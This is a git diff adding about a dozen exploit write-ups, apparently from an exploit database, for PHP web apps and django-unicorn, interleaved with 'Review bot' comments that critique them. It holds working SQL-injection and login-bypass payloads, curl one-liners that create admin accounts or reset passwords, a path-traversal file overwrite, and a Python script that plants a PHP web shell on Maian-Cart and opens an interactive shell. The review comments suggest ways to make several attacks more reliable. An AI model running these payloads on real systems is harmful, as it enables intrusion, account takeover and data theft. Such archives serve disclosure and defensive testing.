diff --git a/exploits/php/webapps/50391.txt b/exploits/php/webapps/50391.txt
new file mode 100644
index 000000000..e22f2b4f3
--- /dev/null
+++ b/exploits/php/webapps/50391.txt
@@ -0,0 +1,40 @@
+# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)
+# Exploit Author: Yash Mahajan
+# Date: 2021-10-07
+# Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/
+# Version: 1
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478
+# Tested On: Windows 10, XAMPP
+# Vulnerable Parameter: searchifsccode
+
+Steps to Reproduce:
+
+1) Navigate to http://127.0.0.1/ifscfinder/ enter any number in search field and capture request in burpsuite.
+2) Paste below request into burp repeater and also create a txt file and paste this request.
+
+Request:
+========
+POST /ifscfinder/search.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 79
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/ifscfinder/
+Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search=
+
+--------------------------------------------------------------------------------
+3) You will see a time delay of 20 Sec in response.
+4) python sqlmap.py -r request.txt -p searchifsccode --dbs
+5) We can retrieve all databases using above sqlmap command
\ No newline at end of file
diff --git a/exploits/php/webapps/50392.txt b/exploits/php/webapps/50392.txt
new file mode 100644
index 000000000..b9e25e41e
--- /dev/null
+++ b/exploits/php/webapps/50392.txt
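Review bot: Step 3 treats one 20-second delay as proof, but a slow XAMPP host or a stalled connection gives the same symptom; the steps should tell the reader to time a baseline request first and to re-run with a different `SLEEP()` value so the delay demonstrably tracks the payload. The header says `# Version: 1` while the title says `1.0`; one of them should change. Nothing names the sink or a fix, and a closing line such as `Remediation: bind searchifsccode in search.php with a prepared statement instead of interpolating it` would make the report actionable for the vendor.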
@@ -0,0 +1,295 @@ +# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) +# Date: 07/10/2021 +# Exploit Author: Hubert Wojciechowski +# Contact Author: snup.php@gmail.com +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html +# Version: 1.0 +# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 + +### Privilage escalation + +# All requests can be sent by both an authenticated and a non-authenticated user + +# The vulnerabilities in the application allow for: + +* Reading any PHP file from the server +* Saving files to parent and child directories and overwriting files in server +* Performing operations by an unauthenticated user with application administrator rights + +----------------------------------------------------------------------------------------------------------------------- +# POC +----------------------------------------------------------------------------------------------------------------------- + +## Example 1 - Reading any PHP file from the server + +Example vuln scripts: +http://localhost/traffic_offense/index.php?p= +http://localhost/traffic_offense/admin/?page= + +# Request reading rrr.php file from other user in serwer + +GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close + +----------------------------------------------------------------------------------------------------------------------- +# Response + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:09:35 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Expires: 
Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Connection: close +[...] +

Hacked file other user in serwer!

+[...] + +----------------------------------------------------------------------------------------------------------------------- + +## Example 2 - Saving files to parent and child directories and overwriting files in server + +# Request to read file + +GET /traffic_offense/index.php HTTP/1.1 +Host: localhost +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Connection: close + +----------------------------------------------------------------------------------------------------------------------- +# Response + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:30:56 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 15095 + + + + + + + Online Traffic Offense Management System - PHP +[...] 
+ +----------------------------------------------------------------------------------------------------------------------- +# Request to overwrite file index.php in main directory webapp + +POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403 +Content-Length: 1928 +Origin: http://localhost +Connection: close +Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4 +Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="id" + +5/../../../index +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="license_id_no" + +GBN-1020061 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="lastname" + +Blake +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="firstname" + +Claire +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="middlename" + +C +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="dob" + +1992-10-12 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="present_address" + +Sample Addss 123 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="permanent_address" + +Sample Addess 123 +-----------------------------329606699635951312463334027403 +Content-Disposition: 
form-data; name="civil_status" + +Married +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="nationality" + +Filipino +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="contact" + +09121789456 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="license_type" + +Non-Professional +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="image_path" + +uploads/drivers/ +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="img"; filename="fuzzdb.php" +Content-Type: image/png + + +-----------------------------329606699635951312463334027403-- + +# New file have extention as this write filename="fuzzdb.php" +# New file have name and locate 5/../../../index we can save file in other directory ;) +# Line must start digit +# We can rewrite config files + +----------------------------------------------------------------------------------------------------------------------- +# Respopnse + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:38:35 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Content-Length: 20 +Connection: close +Content-Type: text/html; charset=UTF-8 + +{"status":"success"} + +----------------------------------------------------------------------------------------------------------------------- +# Request to read file index.php again + +GET /traffic_offense/index.php HTTP/1.1 +Host: localhost +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Connection: close + 
+----------------------------------------------------------------------------------------------------------------------- +# Response + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:42:17 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Access-Control-Allow-Origin: * +Content-Length: 42 +Connection: close +Content-Type: text/html; charset=UTF-8 + +Hacked other client files in this hosting! + +----------------------------------------------------------------------------------------------------------------------- +## Example 4 - Performing operations by an unauthenticated user with application administrator rights + +# The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable +# Request adding new admin user to application by sending a request by an authorized user + +POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 +Content-Length: 949 +Origin: http://localhost +Connection: close +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="id" + +21 +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="firstname" + +hack +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="lastname" + +hack +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="username" + +hack +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; 
name="password" + +hack +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="type" + +1 +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="img"; filename="aaa.php" +Content-Type: application/octet-stream + + + +-----------------------------210106920639395210803657370685-- + +----------------------------------------------------------------------------------------------------------------------- +# Response + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:50:36 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Content-Length: 1 +Connection: close +Content-Type: text/html; charset=UTF-8 + +1 + +# The request worked fine, log into the app using your hack account \ No newline at end of file diff --git a/exploits/php/webapps/50394.py b/exploits/php/webapps/50394.py new file mode 100755 index 000000000..f30148fad --- /dev/null +++ b/exploits/php/webapps/50394.py 
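Review bot: The file-overwrite request in Example 2 shows the `img` part (`filename="fuzzdb.php"`, `Content-Type: image/png`) with an empty body, yet the follow-up GET of index.php returns `Hacked other client files in this hosting!`, so the PHP payload has evidently been lost from the write-up (most likely stripped as markup) and the PoC is not reproducible as published; spell the file content out, base64-encoded if necessary. The section numbering jumps from `## Example 2` to `## Example 4`, so an example is missing or mislabeled. In Example 1 the response body is the rendered output of rrr.php rather than its source, so `index.php?p=` is a local file inclusion, not a file read (the `.php` suffix appears to be appended server-side, which would limit it to PHP files — worth confirming against index.php), and the heading should say inclusion. The overwrite request also carries a `PHPSESSID` cookie and an admin-page Referer although the header says every request works unauthenticated; one sentence confirming the cookie is not required would remove that doubt.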
@@ -0,0 +1,120 @@ +# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 27.11.2020 19:35 +# Tested on: Ubuntu 20.04 LTS +# Exploit Author(s): DreyAnd, purpl3 +# Software Link: https://www.maiancart.com/download.html +# Vendor homepage: https://www.maianscriptworld.co.uk/ +# Version: Maian Cart 3.8 +# CVE: CVE-2021-32172 + +#!/usr/bin/python3 + +import argparse +import requests +from bs4 import BeautifulSoup +import sys +import json +import time + +parser = argparse.ArgumentParser() +parser.add_argument("host", help="Host to exploit (with http/https prefix)") +parser.add_argument("dir", help="default=/ , starting directory of the +maian-cart instance, sometimes is placed at /cart or /maiancart") +args = parser.parse_args() + +#args + +host = sys.argv[1] +directory = sys.argv[2] + +#CREATE THE FILE + +print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True) +time.sleep(1) + +try: + r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw") + print(r.text) + if "added" in r.text: + print("\033[95mFile successfully created.\n\033[00m") + else: + print("\033[91mSome error occured.\033[00m") + +except (requests.exceptions.RequestException): + print("\033[91mThere was a connection issue. 
Check if you're +connected to wifi or if the host is correct\033[00m") + +#GET THE FILE ID + +time.sleep(1) + +file_response = r.text +soup = BeautifulSoup(file_response,'html.parser') +site_json=json.loads(soup.text) +hash_id = [h.get('hash') for h in site_json['added']] +file_id = str(hash_id).replace("['", "").replace("']", "") + + +print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m") +print("\n") + +#WRITE TO THE FILE + +print("\033[95mWritting the payload to the file...\033[00m") +print("\n") +time.sleep(1) + +headers = { + "Accept": "application/json, text/javascript, /; q=0.01", + "Accept-Language" : "en-US,en;q=0.5", + "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8", + "X-Requested-With" : "XMLHttpRequest", + "Connection" : "keep-alive", + "Pragma" : "no-cache", + "Cache-Control" : "no-cache", +} + +data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E" + +try: + write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder", +headers=headers, data=data) + print(write.text) +except (requests.exceptions.RequestException): + print("\033[91mThere was a connection issue. Check if you're +connected to wifi or if the host is correct\033[00m") + + +#EXECUTE THE PAYLOAD + +print("\033[95mExecuting the payload...\033[00m") +print("\n") +time.sleep(1) + +exec_host = f"{host}{directory}/product-downloads/shell.php" + +print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser +url: {host}{directory}/product-downloads/shell.php?cmd=\033[00m") +time.sleep(2) + +while True: + def main(): + execute = str(input("$ ")) + e = requests.get(f"{exec_host}?cmd={execute}") + print(e.text) + + try: + if __name__ == "__main__": + main() + except: + exit = str(input("Do you really wish to exit? Y/N? ")) + + if exit == "Y" or exit =="y": + print("\033[91mExit detected. 
Removing the shell...\033[00m") + remove = +requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}") + print("\033[91m" , remove.text, "\033[00m") + print("\033[91mBye!\033[00m") + sys.exit(1) + else: + main() \ No newline at end of file diff --git a/exploits/php/webapps/50395.txt b/exploits/php/webapps/50395.txt new file mode 100644 index 000000000..3e584392e --- /dev/null +++ b/exploits/php/webapps/50395.txt @@ -0,0 +1,12 @@ +# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated) +# Google Dork: inurl:/plugins/pie-register/ +# Date: 08.10.2021 +# Exploit Author: Lotfi13-DZ +# Vendor Homepage: https://wordpress.org/plugins/pie-register/ +# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip +# Version: <= 3.7.1.4 +# Tested on: ubuntu + +Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin). + +Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null \ No newline at end of file diff --git a/exploits/php/webapps/50396.txt b/exploits/php/webapps/50396.txt new file mode 100644 index 000000000..c0d4e55b0 --- /dev/null +++ b/exploits/php/webapps/50396.txt 
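Review bot: The interactive loop sends the command as `requests.get(f"{exec_host}?cmd={execute}")` with no encoding, so any command containing `&`, `#`, `+` or a space is truncated or rewritten by query parsing before it reaches `system()`; `requests.get(exec_host, params={"cmd": execute})` fixes that in one line. The first `try` prints a message on `RequestException` but falls through, and the next statement `file_response = r.text` then raises `NameError` because `r` was never bound — the `except` should `sys.exit(1)`. The bare `except:` around `main()` is what turns CTRL+C into the exit prompt, but it also hides every other failure (a dropped connection, a JSON error) behind the same prompt; catching `KeyboardInterrupt` explicitly keeps the intent without masking bugs. `host = sys.argv[1]` and `directory = sys.argv[2]` duplicate the already-parsed `args.host`/`args.dir`, and `#!/usr/bin/python3` sits below the header comments, so it is not a shebang and the file only runs with `python3` in front.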
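Review bot: `user_id_social_site=1` is described as the admin, but WordPress does not guarantee that user ID 1 is an administrator (it is merely the account created at install and may have been demoted or removed), so the note should say ID 1 is an assumption and that other IDs can be iterated. The `wget -q -S -O - ... > /dev/null` form throws the body away and depends on `-S` dumping response headers to stderr, which is where the `Set-Cookie` lines appear; that deserves one sentence, since a reader who also redirects stderr sees nothing. The POST goes to `http://localhost/` rather than a plugin endpoint, which presumably works because the plugin hooks the login flow on any front-end request; stating that the path is arbitrary (or which hook fires) would make the one-liner less mysterious.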
@@ -0,0 +1,20 @@
+# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
+# Date: 07.10.2021
+# Exploit Author: Amine ismail @aminei_
+# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Unauthenticated admin creation
+
+Unauthenticated admin creation:
+
+ Request:
+ POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1
+ Host: 127.0.0.1
+ Content-Length: 42
+
+ id=&fullname=admin2&username=admin2&type=1
+
+ PoC to create an admin user named exploitdb and password exploitdb:
+ curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'
\ No newline at end of file
diff --git a/exploits/php/webapps/50397.txt b/exploits/php/webapps/50397.txt
new file mode 100644
index 000000000..7c6afac83
--- /dev/null
+++ b/exploits/php/webapps/50397.txt
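Review bot: The two requests disagree on `password`: the first omits it entirely while the curl PoC sends the 32-hex value `916b5dbd201b469998d9b4a4c8bc4e08` and says the resulting password is `exploitdb`, so the reader cannot tell whether `save_admin` stores the value verbatim or hashes it (the sibling `update_credentials` in 50397 calls `md5()` server-side, which would double-hash a pre-hashed value). State which it is, or show the plaintext form of the PoC. If the first request — with no password at all — really creates an account, say what its login credential ends up being, because that is a second finding. The empty `id=` presumably selects insert over update; if a numeric `id` updates an existing row, an attacker can also rewrite the real admin account, which deserves a sentence.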
@@ -0,0 +1,39 @@
+# Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover
+# Date: 07.10.2021
+# Exploit Author: Amine ismail @aminei_
+# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Unauthenticated password change leading to account takeover
+
+Explanation: By setting the parameter old_password as array, the MD5 function on it returns null, so md5($old_password) == $_SESSION['password'] since we have no session, thus bypassing the check, after that we can use SQLI and inject our custom data.
+
+ Request:
+ POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ Content-Length: 129
+
+ id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test
+
+ Vulnerable code in Actions.php:
+ function update_credentials(){
+ extract($_POST);
+ $data = "";
+ foreach($_POST as $k => $v){
+ if(!in_array($k,array('id','old_password')) && !empty($v)){
+ if(!empty($data)) $data .= ",";
+ if($k == 'password') $v = md5($v);
+ $data .= " `{$k}` = '{$v}' ";
+ }
+ }
+ ... 
+ if(!empty($password) && md5($old_password) != $_SESSION['password']){
+ $resp['status'] = 'failed';
+ $resp['msg'] = "Old password is incorrect.";
+ }else{
+ $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'";
+ @$save = $this->query($sql);
+
+ PoC that changes the password and username of user 'admin' to 'exploitdb':
+ curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials'
\ No newline at end of file
diff --git a/exploits/php/webapps/50398.txt b/exploits/php/webapps/50398.txt
new file mode 100644
index 000000000..a1d733e54
--- /dev/null
+++ b/exploits/php/webapps/50398.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
+# Date: 07.10.2021
+# Exploit Author: Amine ismail @aminei_
+# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Multiple SQL injections
+
+The following PoCs will leak the admin username and password:
+
+Unauthenticated:
+ http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;
+
+Admin:
+ http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
\ No newline at end of file
diff --git a/exploits/php/webapps/50399.txt b/exploits/php/webapps/50399.txt
new file mode 100644
index 000000000..3e00bd2d2
--- /dev/null
+++ b/exploits/php/webapps/50399.txt
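Review bot: The bypass relies on `md5($old_password)` returning NULL for an array, which is PHP 7 behaviour (a warning); on PHP 8 `md5()` throws `TypeError` for a non-string and the request dies before the UPDATE, so the tested PHP version should be stated. From the quoted code the array trick is not even required: the old-password check is guarded by `!empty($password)`, so a request that omits `password` and injects `` `password`='<md5>' `` through the `username` value reaches the UPDATE directly on any PHP version, which is the more robust PoC. Because the query ends in `where admin_id = '{$_SESSION['admin_id']}'` and there is no session, the injected `WHERE admin_id=1;#` is what selects the victim; the explanation should say so, since any `admin_id` can be targeted, and the sample request (`admin_id=4`) and PoC (`admin_id=1`) should agree on one id.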
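Review bot: Neither payload closes the application's own quoting: `id=%27+UNION+SELECT+...+FROM+admin_list;` leaves whatever follows `$id` in the original query dangling, so it only works if the query ends exactly at `'$id'` or SQLite tolerates the remainder; appending `--` to both payloads would make them robust and should be shown. The 7- and 15-column counts are specific to those two queries, and a reader needs to know to re-derive them (for example with `ORDER BY n`) if they differ. The `Admin:` PoC needs an authenticated admin session, so it should be marked post-authentication or cross-reference 50396, which creates one.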
@@ -0,0 +1,21 @@
+# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass
+# Date: 07.10.2021
+# Exploit Author: Amine ismail @aminei_
+# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Admin panel authentication bypass
+
+Admin panel authentication can be bypassed due to a SQL injection in the login form:
+
+Request:
+ POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1
+ Host: 127.0.0.1
+ Content-Length: 63
+ Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q
+
+ user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin=
+
+PoC:
+ curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php
\ No newline at end of file
diff --git a/exploits/php/webapps/50400.txt b/exploits/php/webapps/50400.txt
new file mode 100644
index 000000000..f183b6dd8
--- /dev/null
+++ b/exploits/php/webapps/50400.txt
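Review bot: The curl PoC keeps no cookie jar, so even when the injection succeeds the session it creates is dropped with the response and nothing visible tells the reader it worked; add `-c cookies.txt -i` and name the success indicator (redirect target or a body string). `admin' OR 1=1 LIMIT 1` logs in as whichever row the database returns first — presumably the admin here, but not guaranteed — so `admin'-- -` with a known email is the precise form worth mentioning. The curl data also contains raw spaces (`admin' OR 1=1 LIMIT 1`) where the Burp request used `+`; PHP decodes both, but `--data-urlencode` avoids the question.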
@@ -0,0 +1,31 @@
+# Exploit Title: Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass
+# Date: 08.10.2021
+# Exploit Author: Merve Oral
+# Vendor Homepage: https://www.sourcecodester.com/php/14981/online-employees-work-home-attendance-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14981&title=Online+Employees+Work+From+Home+Attendance+System+in+PHP+and+SQLite+Free+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Online Employees Work From Home Attendance System/Logs in a Web App v1.0 Login page can be bypassed with a simple SQLi to the username parameter.
+
+Steps To Reproduce:
+1 - Go to the login page http://localhost/audit_trail/login.php
+2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
+3 - Click on "Login" button and you are logged in as administrator.
+
+PoC
+
+POST /wfh_attendance/Actions.php?a=login HTTP/1.1
+Host: merve
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 40
+Origin: http://merve
+Connection: close
+Referer: http://merve/wfh_attendance/admin/login.php
+Cookie: PHPSESSID=55nnlgv0kg2qaki92o2s9vl5rq
+
+username=admin'+or+'1'%3D'1&password=any
\ No newline at end of file
diff --git a/exploits/php/webapps/50402.txt b/exploits/php/webapps/50402.txt
new file mode 100644
index 000000000..6301dac75
--- /dev/null
+++ b/exploits/php/webapps/50402.txt
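Review bot: Step 1 sends the reader to `http://localhost/audit_trail/login.php`, but the captured request targets `/wfh_attendance/Actions.php?a=login` with Referer `/wfh_attendance/admin/login.php`; the step should name `/wfh_attendance/admin/login.php` (the `audit_trail` path also appears verbatim in 50402 and looks copied). The payload `admin' or '1'='1` has no comment terminator, so it relies on the application's own closing quote; if the password comparison follows with `AND`, the clause becomes `username='admin' OR ('1'='1' AND password=...)` and succeeds only because `admin` is an existing username — worth stating, since a non-existent username will not bypass. The vendor link says the app is PHP/SQLite, which is why no `#` terminator is used here; a sentence on that keeps it consistent with the MySQL variant in 50402.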
@@ -0,0 +1,31 @@
+# Exploit Title: Loan Management System 1.0 - SQLi Authentication Bypass
+# Date: 08.10.2021
+# Exploit Author: Merve Oral
+# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14471&title=Loan+Management+System+using+PHP%2FMySQL+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10, Kali Linux
+# Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
+
+Steps To Reproduce:
+1 - Go to the login page http://localhost/audit_trail/login.php
+2 - Enter the payload to username field as "admin' or '1'='1'#" without double-quotes and type anything to password field.
+3 - Click on "Login" button and you are logged in as administrator.
+
+PoC
+
+POST /loan/ajax.php?action=login HTTP/1.1
+Host: merve
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 44
+Origin: http://merve
+Connection: close
+Referer: http://merve/loan/login.php
+Cookie: PHPSESSID=911fclrpoa87v9dsp9lh28ck0h
+
+username=admin'+or+'1'%3D'1'%23&password=any
\ No newline at end of file
diff --git a/exploits/python/webapps/50393.txt b/exploits/python/webapps/50393.txt
new file mode 100644
index 000000000..ed23e1d02
--- /dev/null
+++ b/exploits/python/webapps/50393.txt
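Review bot: Step 1's `http://localhost/audit_trail/login.php` does not match the captured request, which posts to `/loan/ajax.php?action=login` from `/loan/login.php`; the step should say `/loan/login.php`. The `%23` (`#`) terminator is MySQL syntax, which agrees with the vendor page (PHP/MySQL) but would not work against the SQLite targets in the sibling write-ups; saying why it is needed — to comment out the password comparison — helps a reader adapting the payload. The request includes a `PHPSESSID`, which is incidental; noting that no prior session is needed would match the 'Authentication Bypass' title.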
@@ -0,0 +1,56 @@
+# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)
+# Date: 10/7/21
+# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
+# Software Link: https://pypi.org/project/django-unicorn/
+# Version: <= 0.35.3
+# CVE: CVE-2021-42053
+
+django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests.
+
+Step 1: Go to www.django-unicorn.com/unicorn/message/todo
